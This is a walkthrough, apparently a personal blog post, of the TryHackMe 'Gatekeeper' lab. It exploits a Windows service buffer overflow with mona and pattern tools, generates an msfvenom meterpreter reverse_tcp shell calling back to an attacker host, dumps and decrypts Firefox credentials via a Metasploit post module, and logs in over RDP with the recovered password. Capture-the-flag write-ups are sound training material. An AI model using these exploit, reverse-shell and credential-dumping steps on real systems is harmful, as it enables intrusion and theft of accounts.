TryHackMe Gatekeeper Walkthrough
Hi guys, my name is Ahmed and my nickname is SadC0d3r.
Today I will solve the Gatekeeper machine.
Difficulty: Medium
OS: Windows

Let's start the machine and grab its IP.
First I will nmap the target.
Target IP = 10.10.135.141
nmap -A -sV 10.10.135.141
In this command I use the -A option to get information about the machine's OS (operating system), and the -sV option to get the version of each running service, because a service version may be vulnerable.



OK, let's read the nmap result.
I found port 31337 open. It caught my attention, so I tried to connect to it with nc (netcat) using this command: nc 10.10.135.141 31337
I didn't get anything back, so I typed a word.

When I typed "sad" it was reflected back on a new line.
OK, let's try reflected XSS in my terminal.
Sorry, I'm kidding 🤣🤣🤣
I tried entering a big input to see what the program would do.

Great, the connection was closed, which means the program on the server crashed.
The next step is to get the binary of this program. I did some directory brute forcing, but this machine has no web page to do that against.
But wait, I saw in the nmap result that SMB is open on this machine, so let's try to connect to SMB with smbclient using this command:
smbclient -L //10.10.142.181

I found ADMIN$ ... etc. I tried to connect to ADMIN$ but couldn't, so then I tried Users.

Done! I can connect and run some commands. I found 3 directories.
I will go to the Share directory.

Yes, I found an exe file. I will download it with this command: get gatekeeper.exe
Then I will go to my Windows machine, run Immunity Debugger as administrator,
and open the exe file from here,

and press F9 twice to run the program,

and get the IP of my Windows machine with this command in cmd: ipconfig
Let's confirm that the program is the same one running on the server by trying to connect on the same port.

Good, it is the same program. Let's start testing for a buffer overflow.
First, all the tools and scripts are here in this link
OK, let's do fuzzing to identify when the program crashes:
put a big input into the program like I did previously.
The first thing in BOF (buffer overflow) testing is to get the offset, to know at which point the buffer overflows.
Then I will generate a 1000-byte pattern with this command:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

Open the exploit script and put our Windows machine's IP in the ip variable, port 31337 in the port variable, and the pattern in the payload variable.

Then run the exploit script and go to Immunity Debugger; you will see the program has crashed.

Then copy the EIP value and go back to the terminal to calculate the offset
with this command:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 39654138
In the -l option I put the byte size I generated, and in the -q option I put the EIP value.

Good, I got the offset. Go to the exploit script again and change the offset variable from 0 to 146,
and confirm the overwrite by changing the padding variable to BBBB and deleting any value in the payload variable.
Restart the program in Immunity by pressing Ctrl+F2 and then F9 twice,
and run the exploit script again.

Normally you would see the value 41414141 in the EIP register, because we send A's, but now you will see EIP is 42424242 because we added the BBBB right after the offset.
The next step is to find the bad characters (characters that cause problems while the payload runs and make the attack fail to get a reverse shell).
I will use the mona module. First set up a working directory for mona with this command:
!mona config -set workingfolder c:\mona\%p
In Immunity I will run this command to generate the list of bad chars from \x01 to \xff; the \x00 char is bad by default:
!mona bytearray -b "\x00"
And run this script in your terminal to generate the same bad-char list:
# prints \x01\x02...\xff on one line, ready to paste into the payload variable
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()


Copy the bad-char list, go to the exploit script and put it in the payload variable.

Now restart the program in Immunity by pressing Ctrl+F2 and F9 twice,
then run the exploit script.
The program will crash again. OK, now I will find the bad chars by two methods.
The first method: go to the ESP register, right click and choose Follow in Dump.


You will find all the chars we generated, except the bad chars, which are missing.
You should check char by char to find which ones are missing; those are the bad chars.
But that is hard, so let's use the second method.
We will use the mona module to find the bad chars with this command (bytearray.bin is the file mona wrote when we generated the byte array):
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>
Replace <ESP> with the value of the ESP register here.
The final command:
!mona compare -f C:\mona\oscp\bytearray.bin -a 02AB19F8
You will get the bad chars: \x00 and \x0a.
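Here is an added Python example (my code, not from the post or from mona) that models what "!mona compare" checks and why the loop has to be repeated: it compares the byte array that was sent against what landed at ESP, excludes the first corrupted byte, and resends until the array arrives intact. The simulated_target function is a constructed stand-in for the real "run the script, then Follow in Dump" step; it simply stops copying at NUL and newline, the two bytes the post found, so the loop ends with the same result.

```python
# Added example, not from the original post: a small model of what
# "!mona compare -f bytearray.bin -a <ESP>" checks. `sent` is the byte array
# placed in the payload, `dump` is what actually landed in memory at ESP.
from typing import Callable, Iterable, Optional


def make_bytearray(exclude: Iterable[int] = ()) -> bytes:
    """Every byte value 0x00..0xff minus the ones already known to be bad
    (the same array `!mona bytearray -b "..."` writes to bytearray.bin)."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def first_mismatch(sent: bytes, dump: bytes) -> Optional[int]:
    """Index of the first byte that did not arrive intact, or None if the
    whole array is unmodified. Only the first difference is meaningful: once
    one byte is mangled, the rest of the buffer is usually truncated or
    shifted, so every later position looks corrupted as well."""
    for i, b in enumerate(sent):
        if i >= len(dump) or dump[i] != b:
            return i
    return None


def find_bad_chars(send_and_dump: Callable[[bytes], bytes],
                   known_bad: Iterable[int] = (0x00,)) -> list:
    """Iterate the way the post does with mona: send the array, read memory at
    ESP, exclude the first corrupted byte, and repeat until it arrives clean."""
    bad = set(known_bad)
    while True:
        sent = make_bytearray(bad)
        idx = first_mismatch(sent, send_and_dump(sent))
        if idx is None:
            return sorted(bad)
        bad.add(sent[idx])


def simulated_target(payload: bytes) -> bytes:
    """Constructed stand-in for 'run the exploit script, then Follow in Dump
    at ESP'. It models a service that stops copying at NUL or newline (the
    two bytes the post found to be bad) and leaves stale stack data after."""
    for terminator in (b"\x00", b"\x0a"):
        cut = payload.find(terminator)
        if cut != -1:
            payload = payload[:cut]
    return payload + b"\xcc" * 16  # whatever was on the stack before the copy


if __name__ == "__main__":
    found = find_bad_chars(simulated_target)
    print(" ".join(f"\\x{b:02x}" for b in found))  # \x00 \x0a
```

The first round reports index 9 (the \x0a byte, since \x00 was never sent); after excluding it the second round matches completely, so the result is the same \x00 and \x0a list that mona printed. That is also why mona tells you to remove only the first reported byte and rerun: the positions after a truncation are not evidence of anything.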

OK, now we will find a jump point. This is an address without any protection that we will redirect execution to, so it lands on my shellcode,
using this command:
!mona jmp -r esp -cpb "\x00\x0a"
Include all the bad chars,
and run it.

Here you will get two addresses; choose either one. If you don't see the result, go to the working directory; you will find a file containing the result, which is bigger than this terminal can show:
C:\mona\gatekeeper\jmp.txt
Now I will write the address in reverse byte order (little-endian).
The address is 0x080414c3, so you should write \xc3\x14\x04\x08
and add it to the retn variable in the exploit script.
OK, now generate the payload to gain the reverse shell.
I will use msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.71.200 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c
I will generate a meterpreter reverse shell. Change LHOST to your Kali machine (your attack box) and LPORT to any preferred port (I will use port 4444). In -b put the bad chars you found so they are excluded, and -f selects the output format; I use c, but you can use py for Python.

This is the payload. Go to the exploit script and put this payload in the payload variable, and in the padding variable put the value "\x90" * 16 to leave some space before our shellcode runs.

Very good. Now open Metasploit with the command msfconsole to configure our listener.
After Metasploit opens, write this command to use the multi handler:
use exploit/multi/handler

Now write options to see the multi handler options.

These are the options.
Now write this command to set your local IP:
set LHOST <YOUR IP>

And use this command to set the payload type to the one I generated, windows/meterpreter/reverse_tcp:
set PAYLOAD windows/meterpreter/reverse_tcp
And now write run.

Now go to the exploit script and change the ip variable to the machine's IP,
and run the exploit script.
BooooM

We got the meterpreter shell.

This is info about the machine.
Write the ls command and don't worry about the OS; meterpreter will run the correct command.

The file user.txt.txt is the user flag.
Write cat user.txt.txt

Now the party starts: privilege escalation time.
When I ran the ls command earlier I found Firefox.lnk.
Firefox.lnk is a shortcut icon, which means this machine has the Firefox browser.
Why not try to dump the credentials? Let's try.
OK, now press Ctrl+Z in the meterpreter shell and choose yes to keep it in the background,
and now use post/multi/gather/firefox_creds to dump the user's credentials:
use post/multi/gather/firefox_creds

Write options.

It needs the session number; you can get it with this command:
sessions

The session id.
Now write set SESSION 1 to set the session, and then write run.

Now it dumps the info to this path: /home/kali/.msf4/loot/
Check your terminal for the exact path.
Now I will try to decrypt the info with this tool (firefox_decrypt.py)
But when I tried to run this tool it didn't work. I went to Google and did some searching, and found that we should rename the files to cert9.db, cookies.sqlite, logins.json and key4.db.
OK, now I will rename all the files.

Now I will run the tool with this command:
python3 firefox_decrypt.py ./

Great, I found a username and password. I will try to use them to connect to the server over RDP with this command:
xfreerdp /u:mayor /p:8CL7O1 /cert:ignore /v:10.10.230.43 /workarea
In /u: put the username, /p: the password, /v: the machine IP.

The root flag is in the file root.txt.

And the machine has been pwned.
I hope you liked the explanation, thank you.
Follow me on Twitter:
Ahmed Rabeaa Mosaa (@AhmedMosaa18) / Twitter
and LinkedIn